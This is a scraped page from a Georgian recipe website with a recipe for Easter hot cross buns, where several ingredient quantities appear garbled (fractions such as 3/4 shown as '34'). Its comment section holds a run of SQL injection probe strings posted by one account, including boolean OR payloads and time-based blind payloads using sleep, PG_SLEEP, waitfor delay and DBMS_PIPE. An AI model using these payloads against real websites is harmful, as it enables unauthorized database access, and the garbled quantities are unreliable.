რეგისტრაცია შესვლა
1
გამარჯობა,
  • კულინარიული აღმოჩენების დროა!
  • ჩაინიშნეთ და შეაფასეთ საყვარელი რეცეპტები
  • გაუზიარეთ სხვებსაც საკუთარი კულინარიული შემოქმედება
დარეგისტრირდით ახლავე!
1
გამარჯობა,
კულინარიული აღმოჩენების დროა!
ჩაინიშნეთ და შეაფასეთ საყვარელი რეცეპტები
გაუზიარეთ სხვებსაც საკუთარი კულინარიული შემოქმედება
განათავსე რეცეპტები!

სააღდგომო ჯვრიანი ფუნთუშები

სააღდგომო ფუნთუშები, რომლებიც ისეთი გემრიელია, რომ დღესასწაულის შემდეგაც ხშირად მოამზადებთ.
სააღდგომო ფუნთუშები, რომლებიც ისეთი გემრიელია, რომ დღესასწაულის შემდეგაც ხშირად მოამზადებთ.

0:00:00
12 ულუფა
ბეჭდვა
რეცეპტის ინგრედიენტები
34   ჭიქა თბილი წყალი (45C)
3   ს/კ კარაქი
1   ს/კ რძის ფხვნილი
14   ჭიქა თეთრი შაქარი
38   ჩ/კ მარილი
1   ცალი კვერცხი
1   ცალი კვეცხის ცილა
1   ცალი კვერცხის გული
3   ჭიქა ფქვილი
1   ს/კ მშრალი აქტიური საფუარი
34   ჭიქა მოცხარის ჩირი
1   ჩ/კ დაფქული დარიჩინი
2   ს/კ წყალი
12   ჭიქა შაქრის პუდრა
14   ჩ/კ ვანილის ექსტრაქტი
2   ჩ/კ რძე
რეცეპტის მომზადების საფეხურები
1

მოათავსეთ თბილი წყალი, კარაქი, რძის ფხვნილი, 1/4 ჭიქა შაქარი, მარილი, კვერცხი, ცილა, ფქვილი და საფუარი პურის საცხობში და მოზილეთ ცომი.

2

მოზელის დამთავრებამდე 5 წუთით ადრე, დაუმატეთ მოცხარის ჩირი და დარიჩინი. დატოვეთ საცხობში აფუებლად. (თუ პურის საცხობი არ გაქვთ, შეგიძლიათ ცომი ხელით/მიქსერით მოზილოთ: თავდაპირველად, საფუარი თბილ წყალში გახსენით და 5 წუთით გააჩერეთ. დაუმატეთ ფქვილი, რძის ფხვნილი, შაქარი, მარილი, კვერცხი, ცილა და მოზილეთ. დაუმატეთ დარბილებული კარაქი, დარიჩინი და მოცხარი და გააგრძელეთ ზელა. ცომი ცხიმმოსმულ თასზე გადაიტანეთ, საკვების შესაფუთი ცელოფანი და ქაღალდის ხელსახოცი დააფარეთ და დააცადეთ აფუვდეს, დაახლოებით 1 საათით. შემდეგ, ჩვეულებრივ, მიყევით რეცეპტის შემდგომ ინსტრუქციას.)

3

გადმოიტანეთ ფქვილმოყრილ ზედაპირზე, დააფარეთ და 10 წუთით დატოვეთ.

4

გააკეთეთ 12 ბურთულა და მოათავსეთ 22X33 სმ ზომის საცხობ ლანგარზე. დააფარეთ და თბილ ადგილას დადეთ რომ აფუვდეს, დაახლოებით 35–40 წუთით.

5

ათქვიფეთ კვერცხის გული და 2 ს/კ წყალი. ფუნჯით გადაუსვით ფუნთუშებს.

6

აცხვეთ 190 C-ზე 20 წუთით. შემდეგ გადმოიღეთ ლანგრიდან და გააგრილეთ რკინის ცხაურზე.

7

გააკეთეთ ჯვრები: ერთად ათქვიფეთ შაქრის პურდა, ვანილი და რძე. მიღებული მასა გადაიტანეთ კრემის მოსართავ ფორმაში(საკონდიტრო ტომარა) და გააკეთეთ ჯვრის ფორმა თითოეულ ფუნთუშაზე. გემრიელად მიირთვით! :)

კომენტარები
34 კომენტარი

lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
-1 OR 2+845-845-1=0+0+0+1 --
lxbfYeaa
02/14/2025
-1 OR 2+722-722-1=0+0+0+1
lxbfYeaa
02/14/2025
-1' OR 2+984-984-1=0+0+0+1 --
lxbfYeaa
02/14/2025
-1' OR 2+781-781-1=0+0+0+1 or 'h15zv5KY'='
lxbfYeaa
02/14/2025
-1" OR 2+893-893-1=0+0+0+1 --
lxbfYeaa
02/14/2025
555*if(now()=sysdate(),sleep(15),0)
lxbfYeaa
02/14/2025
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
lxbfYeaa
02/14/2025
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
lxbfYeaa
02/14/2025
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
lxbfYeaa
02/14/2025
555-1
lxbfYeaa
02/14/2025
555-1)
lxbfYeaa
02/14/2025
555-1 waitfor delay '0:0:15' --
lxbfYeaa
02/14/2025
555wYfR7JjI'
lxbfYeaa
02/14/2025
555-1 OR 279=(SELECT 279 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555-1) OR 672=(SELECT 672 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555tye1WMAa' OR 974=(SELECT 974 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555zMWQqQ7c') OR 428=(SELECT 428 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555RCm5tNH2')) OR 518=(SELECT 518 FROM PG_SLEEP(15))--
lxbfYeaa
02/14/2025
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
lxbfYeaa
02/14/2025
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555'"
lxbfYeaa
02/14/2025
555����%2527%2522\'\"
lxbfYeaa
02/14/2025
@@nVzI0
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
lxbfYeaa
02/14/2025
555
ბოლოს განთავსებული
როგორ ავირჩიოთ ბინა იდეალური სამზარეულოთი
საკვების მოსამზადებლად იდეალური სამზარეულოს მქონე ბინის არჩევა მნიშვნელოვანი ნაბიჯია კულინარიის ყველა მოყვარულისთვის.
თარიღი: 06/01/2024
ავტორი: tomato
ცხელი შოკოლადი
ატმის აზიური სალათა
რამდენიმე ხრიკი, თუ როგორ მოვამზადოთ წვნიანი და რბილი ქათამი
ქათმის მომზადება ერთი შეხედვით ადვილია, მაგრამ ხშირად საბოლოო შედეგი მაინც გამომშრალი ხორცია. ჩვენ გაგიზიარებთ რამდენიმე მარტივ რჩევას, რის შემდეგაც თქვენი ქათმის ხორცი წვნიანი და ფაფუკი გახდება.
თარიღი: 06/10/2022
ავტორი: Tekla_mi
როგორ უნდა დაიჭრას მთლიანი ქათამი
როგორ დავჭრათ მთლიანი ქათამი ნაჭრებად.
როგორ გავაკეთოთ ხურმის ჩირი
მოამზადეთ უგემრიელესი ხურმის ჩირი საკუთარი ხელით ძალიან მარტივად :)
მსგავსი რეცეპტები
სცადეთ, გამოაცხვეთ, ზუსტად დაიცავით ინსტრუქციები და გარწმუნებთ, რომ აღარასდროს იყიდით კულიჩს.
სცადეთ, გამოაცხვეთ, ზუსტად დაიცავით ინსტრუქციები და გარწმუნებთ, რომ აღარასდროს იყიდით კულიჩს.
ავტორი:
ყველა ქვეყანას პასკის განსხვავებული რეცეპტი აქვს. გთავაზობთ ბერძნული სააღდგომო პურის რეცეპტს.
ყველა ქვეყანას პასკის განსხვავებული რეცეპტი აქვს. გთავაზობთ ბერძნული სააღდგომო პურის რეცეპტს.
ავტორი:
გამომცხვარი სოკო ბოსტნეულთან ერთად რუმინული ტრადიციული სააღდგომო რეცეპტია.
გამომცხვარი სოკო ბოსტნეულთან ერთად რუმინული ტრადიციული სააღდგომო რეცეპტია.
ავტორი:
თქვენი სააღდგომო სუფრის მშვენება – უგემრიელესი ნამცხვარი, რომელიც პირველივე დანახვისთანავე მოგხიბლავთ.
თქვენი სააღდგომო სუფრის მშვენება – უგემრიელესი ნამცხვარი, რომელიც პირველივე დანახვისთანავე მოგხიბლავთ.
ავტორი: